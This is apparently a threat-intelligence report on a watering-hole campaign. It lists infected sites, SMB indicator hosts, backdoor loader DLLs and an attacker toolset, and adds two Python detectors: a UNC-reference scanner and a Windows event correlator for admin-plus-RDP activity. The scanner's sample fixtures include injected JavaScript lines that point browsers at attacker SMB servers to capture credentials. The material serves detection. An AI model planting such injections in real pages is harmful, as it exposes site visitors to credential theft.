Table 1. Watering hole website details

TLD | Region | Vertical | Infected JavaScript | SMB URL
gov.lb | Lebanon | Intelligence agency | /assets/js/front/jquery.min.js | 51.254.173.240/file.gif
org.sa | Saudi Arabia | Healthcare | /JavaScript/CommonJScript.js | adobe-plugin.bid/file.gif
edu.az | Azerbaijan | University | /_layouts/1033/init.js | 188.165.187.235/file.gif

Table 2. Reflective loader DLLs

File name | PDB string | Purpose
dnf2.x86.dll | …\Desktop\DLL\rat\code\dnf2\32\… | Drops & installs Backdoor.Sorgu
dnf2.x64.dll | | Drops & installs Backdoor.Sorgu
dnf4.x86.dll | …\Desktop\DLL\rat\code\dnf4\32\… | Drops & installs Backdoor.Sorgu
dnf4.x64.dll | | Drops & installs Backdoor.Sorgu
guester.x86.dll | …\Desktop\NSA\Payloads\guestsaz\32\… | Drops & installs Trojan.Imecab
guester.x64.dll | | Drops & installs Trojan.Imecab
remote.x86.dll | …\Desktop\NSA\Payloads\DLL\code\32\… | Enables the Windows Remote Desktop (RDP) service
remote.x64.dll | …\Desktop\NSA\Payloads\DLL\code\32\x64\Release\… | Enables the Windows Remote Desktop (RDP) service
adm.add.x86.dll | …\Desktop\DLL\code\32\Release\… | Creates/activates an admin user with a hardcoded password
adm.add.x64.dll | …\Desktop\shellcode\x64\Release\… | Creates/activates an admin user with a hardcoded password
vmware.x86.dll | …\Desktop\ReflectiveDLLInjection-master\… | Creates an admin user for Remote Desktop Protocol access
vmware.x64.dll | …\Desktop\shellcode\x64\Release\… | Creates an admin user for Remote Desktop Protocol access

Table 3. Toolset for lateral movement, information gathering, and exfiltration

Software | Purpose | Description | Customized | Obfuscated
MSF Rotten Potato | Local | Privilege escalation | X (marked in one of the two columns; the flattened source does not preserve which) |
Mimikatz/OrangeTeghal | Lateral | Login/password retrieval | X | X
LaZagne | Lateral | Login/password retrieval | |
THC Hydra | Lateral | Dictionary attacks against logins of network services | |
Sysinternals PsExec | Lateral | Launch remote processes | |
Total SMB BruteForcer | Lateral | Brute-force SMB logins | X (marked in one of the two columns; the flattened source does not preserve which) |
Sysinternals PsInfo | Info | Get detailed information about remote systems | |
Router Scan v2.47 | Info | Scan for wireless networks | |
MailSniper | Exfiltration | Search Exchange server mailboxes for keywords | |
Sobolsoft Extract Attachments | Exfiltration | Extract attachments from EML email files | |
SysTools SQL Backup Recovery | Exfiltration | Export backup of MSSQL databases | |
HoboCopy | Exfiltration | Disk backup | |
Voidtools Everything | Exfiltration | Desktop file indexing & search | |
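The injections in Table 1 work by making the visitor's browser fetch a resource from an attacker-controlled SMB server; a Windows client that follows a file:// or UNC reference attempts SMB authentication, which is what makes such a link worth planting. The following scanner is an added example, not code from the report or from the attackers: it walks a site's script files, extracts every file:// or UNC reference (both the plain form and the backslash-escaped form a UNC path takes inside a JavaScript or HTML string literal) and flags the host against the three SMB servers in Table 1. The sample scripts are constructed here; the report gives only the script path and the SMB URL, so the injected statements (an Image() preload, a hidden img tag) are assumed forms, and the function and variable names are this example's own.

```python
from __future__ import annotations
import re
from dataclasses import dataclass

# SMB hosts from Table 1 of the report (page data).
KNOWN_SMB_HOSTS = {"51.254.173.240", "adobe-plugin.bid", "188.165.187.235"}

# Forms in which script source can make a Windows client open an SMB resource:
#   file://host/file.gif            file:\\\\host\\file.gif
#   "\\\\host\\file.gif"            (a UNC path inside a JS/HTML string literal,
#                                    so the backslashes appear escaped in source)
# Protocol-relative URLs (//cdn.example.com/x.js) are deliberately NOT matched:
# a browser resolves them over http(s), not SMB.
UNC_RE = re.compile(
    r"(?:file:(?:/{2,}|\\{2,})|\\{2,})"                                  # file:// or UNC prefix
    r"(?P<host>\d{1,3}(?:\.\d{1,3}){3}|[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+)"  # IP or FQDN
    r"(?:\\+|/)"                                                          # share/path separator
    r"(?P<path>[^\s'\"<>);,]+)",                                          # up to end of literal
    re.IGNORECASE,
)


@dataclass(frozen=True)
class SmbRef:
    host: str
    path: str
    raw: str          # the matched text as it appears in the script
    known_ioc: bool   # host is one of the Table 1 SMB servers


def find_smb_references(js_source: str) -> list[SmbRef]:
    """Return every file:// or UNC reference found in one script's source."""
    refs = []
    for m in UNC_RE.finditer(js_source):
        host = m.group("host").lower()
        path = m.group("path").replace("\\", "/")
        refs.append(SmbRef(host, path, m.group(0), host in KNOWN_SMB_HOSTS))
    return refs


def scan_sources(sources: dict[str, str]) -> dict[str, list[SmbRef]]:
    """Map script path -> references, keeping only scripts that contain any."""
    out: dict[str, list[SmbRef]] = {}
    for path, src in sources.items():
        hits = find_smb_references(src)
        if hits:
            out[path] = hits
    return out


# Constructed sample scripts (not from the report). The paths are the ones
# Table 1 lists; the injected statements are assumed forms.
SAMPLES = {
    "clean/app.js": 'var u = "https://code.jquery.com/jquery-3.3.1.min.js";',
    "assets/js/front/jquery.min.js":
        '/*! jQuery v1.12.4 */\nvar i = new Image(); i.src = "file://51.254.173.240/file.gif";',
    "JavaScript/CommonJScript.js":
        "document.write('<img src=\"\\\\\\\\adobe-plugin.bid\\\\file.gif\" style=\"display:none\">');",
    "_layouts/1033/init.js":
        r"var p = '\\\\188.165.187.235\\file.gif'; new Image().src = p;",
}

if __name__ == "__main__":
    for script, refs in scan_sources(SAMPLES).items():
        for r in refs:
            flag = "KNOWN IOC" if r.known_ioc else "unknown host"
            print(f"{script}: {r.host}/{r.path}  [{flag}]  <- {r.raw}")
```

Run it over a checkout or a crawl of the site's static files; any hit is worth a look even when the host is not one of the three known servers, since a legitimate web page has no reason to reference a UNC path at all. Concatenated or encoded strings ("\\\\" + host) are outside what this regex sees.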
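Two of the loaders in Table 2 leave a distinctive host-level trace: adm.add creates or activates an administrator account and remote switches on the RDP service. The correlation below is an added example, not the report's detection logic or any vendor's rule: it looks for a user account created (Security event 4720) and added to the local Administrators group (4732) on the same host within a short window, separately for the RDP switch (a 4657 registry modification setting fDenyTSConnections to 0), and rates both on one host close together as the strongest signal. The event records are constructed here in a SIEM-normalised shape; the MemberName in 4732 is assumed to be already resolved (raw events often carry only MemberSid), the 30-minute window is an assumption, and 4657 is only logged when "Audit Registry" is enabled and the Terminal Server key has a SACL.

```python
from __future__ import annotations
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass(frozen=True)
class Event:
    ts: datetime
    host: str
    event_id: int    # Windows Security log event ID
    fields: dict     # EventData fields, as a SIEM would normalise them


@dataclass(frozen=True)
class Finding:
    host: str
    kind: str        # "new-local-admin", "rdp-enabled" or "admin+rdp"
    detail: str
    first_seen: datetime
    last_seen: datetime


# Registry value the RDP listener honours; 0 means connections are allowed.
TS_KEY = r"\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"
WINDOW = timedelta(minutes=30)   # assumed correlation window


def _t(s: str) -> datetime:
    return datetime.fromisoformat(s)


# Constructed sample events (not from the report). FS01 shows the sequence the
# adm.add / remote DLLs would leave behind; WS22 is ordinary helpdesk activity.
SAMPLE_EVENTS = [
    Event(_t("2018-07-01T02:14:05"), "FS01", 4720, {"SubjectUserName": "FS01$", "TargetUserName": "support_adm"}),
    Event(_t("2018-07-01T02:14:05"), "FS01", 4722, {"TargetUserName": "support_adm"}),
    Event(_t("2018-07-01T02:14:06"), "FS01", 4732, {"MemberName": "FS01\\support_adm", "TargetUserName": "Administrators"}),
    Event(_t("2018-07-01T02:14:09"), "FS01", 4657, {"ObjectName": TS_KEY, "ObjectValueName": "fDenyTSConnections", "NewValue": "0"}),
    Event(_t("2018-07-01T09:30:00"), "WS22", 4720, {"SubjectUserName": "helpdesk", "TargetUserName": "jdoe"}),
    Event(_t("2018-07-01T09:31:00"), "WS22", 4732, {"MemberName": "WS22\\jdoe", "TargetUserName": "Remote Desktop Users"}),
    Event(_t("2018-07-02T11:00:00"), "WS22", 4657, {"ObjectName": TS_KEY, "ObjectValueName": "fDenyTSConnections", "NewValue": "0"}),
]


def find_new_local_admins(events: list[Event]) -> list[Finding]:
    """Account created (4720) then added to Administrators (4732) on one host within WINDOW."""
    created: dict[tuple[str, str], datetime] = {}
    findings: list[Finding] = []
    for e in sorted(events, key=lambda ev: ev.ts):
        f = e.fields
        if e.event_id == 4720:
            created[(e.host, f["TargetUserName"].lower())] = e.ts
        elif e.event_id == 4732 and f.get("TargetUserName", "").lower() == "administrators":
            user = f.get("MemberName", "").split("\\")[-1].lower()   # assumes resolved name
            t0 = created.get((e.host, user))
            if t0 is not None and e.ts - t0 <= WINDOW:
                findings.append(Finding(e.host, "new-local-admin", user, t0, e.ts))
    return findings


def find_rdp_enabled(events: list[Event]) -> list[Finding]:
    """fDenyTSConnections flipped to 0 (4657): the RDP listener was switched on."""
    return [
        Finding(e.host, "rdp-enabled", "fDenyTSConnections set to 0", e.ts, e.ts)
        for e in sorted(events, key=lambda ev: ev.ts)
        if e.event_id == 4657
        and e.fields.get("ObjectName") == TS_KEY
        and e.fields.get("ObjectValueName", "").lower() == "fdenytsconnections"
        and e.fields.get("NewValue") == "0"
    ]


def correlate(events: list[Event]) -> list[Finding]:
    """Both behaviours on one host close together is the strongest signal."""
    admins = find_new_local_admins(events)
    rdp = find_rdp_enabled(events)
    findings = admins + rdp
    for a in admins:
        for r in rdp:
            if a.host == r.host and abs(r.first_seen - a.last_seen) <= WINDOW:
                findings.append(Finding(
                    a.host, "admin+rdp", f"{a.detail} made admin, then RDP enabled",
                    min(a.first_seen, r.first_seen), max(a.last_seen, r.last_seen)))
    return findings


if __name__ == "__main__":
    for fnd in correlate(SAMPLE_EVENTS):
        print(f"{fnd.host:5} {fnd.kind:16} {fnd.first_seen:%Y-%m-%d %H:%M:%S} {fnd.detail}")
```

On the sample, FS01 produces all three finding kinds while WS22 produces only a lone rdp-enabled finding (the jdoe account went into Remote Desktop Users, not Administrators, and the registry change came a day later). A vmware.*.dll-style "admin user for RDP access" shows up under the same rules, since it combines the same two events.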